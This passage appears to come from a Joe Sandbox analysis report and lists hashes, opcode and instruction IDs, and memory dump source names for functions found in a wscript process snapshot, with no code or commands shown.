                                                                                                          • API String ID: 1302938615-2137968064
                                                                                                          • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                          • Instruction ID: a51a8cfb6f58d6eb79ddfb19e58350315ec728e9090c7ae9367b5785fbf3c2f8
                                                                                                          • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                          • Instruction Fuzzy Hash: A791E970E442369BDB24DE99CA816FEB7A9FF44320F14467AE815F72D8E730B9408760
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $$@
                                                                                                          • API String ID: 0-1194432280
                                                                                                          • Opcode ID: 9d1afe584bc6d6491c9654ff6abe716fdd056fc397dc9b0dedf0eb8707dd45fa
                                                                                                          • Instruction ID: c0055a966e1e1ce09f749e24d999c0e85f6fd65913078aa54e2888f233041708
                                                                                                          • Opcode Fuzzy Hash: 9d1afe584bc6d6491c9654ff6abe716fdd056fc397dc9b0dedf0eb8707dd45fa
                                                                                                          • Instruction Fuzzy Hash: B9812DB1D002699BDB31CB54CC44BEAB7B8AB49754F0046EAE919B7240E7746E80CFA0
                                                                                                          APIs
                                                                                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 0496CFBD
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CallFilterFunc@8
                                                                                                          • String ID: @$@4Cw@4Cw
                                                                                                          • API String ID: 4062629308-3101775584
                                                                                                          • Opcode ID: 30ee86308a69ac4b338084cc2fdf2e6c2509c844c7a5c7e6adf6aef4d19f6eac
                                                                                                          • Instruction ID: 5ccbf9e05162e1fba5d913909030bf5760b83cb0411262f47a21dbb4882082f1
                                                                                                          • Opcode Fuzzy Hash: 30ee86308a69ac4b338084cc2fdf2e6c2509c844c7a5c7e6adf6aef4d19f6eac
                                                                                                          • Instruction Fuzzy Hash: 5241A271A00218DFDB21DF99D940AADBBB8FF85B04F00863AE916DB254D774F841DB61